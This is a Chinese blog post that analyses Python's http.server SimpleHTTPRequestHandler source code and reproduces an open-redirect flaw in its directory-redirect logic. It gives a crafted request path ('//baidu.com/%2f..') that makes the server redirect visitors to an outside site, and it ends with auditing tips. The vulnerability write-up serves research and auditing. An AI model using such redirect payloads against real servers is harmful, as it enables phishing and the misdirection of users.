源码分析
众所周知Python有一个一键启动Web服务器的方法:
python3 -m http.server port
在任意目录执行如上命令,即可启动一个web文件服务器,这个方法用到了http.server模块,该模块包含以下几个比较重要的类:
- HTTPServer这个类继承于socketserver.TCPServer,说明其实HTTP服务器本质是一个TCP服务器
- BaseHTTPRequestHandler,这是一个处理TCP协议内容的Handler,目的就是将从TCP流中获取的数据按照HTTP协议进行解析,并按照HTTP协议返回相应数据包,但这个类解析数据包后没有进行任何操作,不能直接使用,如果我们要写自己的Web应用,可以继承这个类,并实现其中的do_XXX等方法
- SimpleHTTPRequestHandler,这个类继承于BaseHTTPRequestHandler,从父类中拿到解析好的数据包,并将用户请求的path返回给用户,等于实现了一个静态文件服务器
- CGIHTTPRequestHandler,这个类继承于SimpleHTTPRequestHandler,在静态文件服务器的基础上,增加了执行CGI脚本的功能
简单来说就是如下:
+-----------+ +------------------------+
| TCPServer | | BaseHTTPRequestHandler |
+-----------+ +------------------------+
^ |
| v
| +--------------------------+
+----------------| SimpleHTTPRequestHandler |
| +--------------------------+
| |
| v
| +-----------------------+
+-----------------| CGIHTTPRequestHandler |
+-----------------------+
下面我们看一下SimpleHTTPRequestHandler的源代码:
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
"""Simple HTTP request handler with GET and HEAD commands.
This serves files from the current directory and any of its
subdirectories. The MIME type for files is determined by
calling the .guess_type() method.
The GET and HEAD requests are identical except that the HEAD
request omits the actual contents of the file.
"""
server_version = "SimpleHTTP/" + __version__
def __init__(self, *args, directory=None, **kwargs):
if directory is None:
directory = os.getcwd()
self.directory = directory
super().__init__(*args, **kwargs)
def do_GET(self):
"""Serve a GET request."""
f = self.send_head()
if f:
try:
self.copyfile(f, self.wfile)
finally:
f.close()
def do_HEAD(self):
"""Serve a HEAD request."""
f = self.send_head()
if f:
f.close()
def send_head(self):
"""Common code for GET and HEAD commands.
This sends the response code and MIME headers.
Return value is either a file object (which has to be copied
to the outputfile by the caller unless the command was HEAD,
and must be closed by the caller under all circumstances), or
None, in which case the caller has nothing further to do.
"""
path = self.translate_path(self.path)
f = None
if os.path.isdir(path):
parts = urllib.parse.urlsplit(self.path)
if not parts.path.endswith('/'):
# redirect browser - doing basically what apache does
self.send_response(HTTPStatus.MOVED_PERMANENTLY)
new_parts = (parts[0], parts[1], parts[2] + '/',
parts[3], parts[4])
new_url = urllib.parse.urlunsplit(new_parts)
self.send_header("Location", new_url)
self.end_headers()
return None
for index in "index.html", "index.htm":
index = os.path.join(path, index)
if os.path.exists(index):
path = index
break
else:
return self.list_directory(path)
ctype = self.guess_type(path)
try:
f = open(path, 'rb')
except OSError:
self.send_error(HTTPStatus.NOT_FOUND, "File not found")
return None
try:
fs = os.fstat(f.fileno())
# Use browser cache if possible
if ("If-Modified-Since" in self.headers
and "If-None-Match" not in self.headers):
# compare If-Modified-Since and time of last file modification
try:
ims = email.utils.parsedate_to_datetime(
self.headers["If-Modified-Since"])
except (TypeError, IndexError, OverflowError, ValueError):
# ignore ill-formed values
pass
else:
if ims.tzinfo is None:
# obsolete format with no timezone, cf.
# https://tools.ietf.org/html/rfc7231#section-7.1.1.1
ims = ims.replace(tzinfo=datetime.timezone.utc)
if ims.tzinfo is datetime.timezone.utc:
# compare to UTC datetime of last modification
last_modif = datetime.datetime.fromtimestamp(
fs.st_mtime, datetime.timezone.utc)
# remove microseconds, like in If-Modified-Since
last_modif = last_modif.replace(microsecond=0)
if last_modif <= ims:
self.send_response(HTTPStatus.NOT_MODIFIED)
self.end_headers()
f.close()
return None
self.send_response(HTTPStatus.OK)
self.send_header("Content-type", ctype)
self.send_header("Content-Length", str(fs[6]))
self.send_header("Last-Modified",
self.date_time_string(fs.st_mtime))
self.end_headers()
return f
except:
f.close()
raise
...
前面HTTP解析的部分不再分析,如果我们请求的是GET方法,将会被分配到do_GET函数里,在do_GET()中调用了send_head()方法
send_head()中调用了self.translate_path(self.path)将request path进行一个标准化操作,目的是获取用户真正请求的文件,如果这个path是一个已存在的目录,则进入if语句, 如果用户请求的path不是以/结尾,则进入第二个if语句,这个语句中执行了HTTP跳转的操作,这就是我们当前漏洞的关键点了:
漏洞复现
在chrome、firefox等主流浏览器中,如果url以//domain开头,浏览器将会默认认为这个url是当前数据包的协议,比如,当我们在浏览器中访问http://example.com//baidu.com/时,浏览器会默认认为要跳转到http://baidu.com,而不是跳转到.//baidu.com/目录,所以,如果我们发送的请求的是GET //baidu.com HTTP/1.0\r\n\r\n,那么将会被重定向到//baidu.com/,也就产生了一个任意URL跳转漏洞。
在这里,由于目录baidu.com不存在,我们还需要绕过if os.path.isdir(path)这条if语句,而绕过方法也很简单,因为baidu.com不存在,我们跳转到上一层目录即可:
GET //baidu.com/%2f.. HTTP/1.0\r\n\r\n
下面我们做一个简单的测试,在本地的test目录下启动一个http.server服务:
之后在浏览器中访问http://127.0.0.1:1234//baidu.com%2f..即可发现跳转到了http://www.baidu.com/search/error.html
漏洞价值
虽然说python核心库存在这个漏洞,不过通常情况下不会有人直接在生产环境用python -m http.server,但是我们在做类似审计的时候可以关注一些请求处理,查看一些doGet以及doPost时是否有继承并使用SimpleHTTPRequestHandler类的,如果有的话可以进行跟进一步的分析,查看是否可以利用~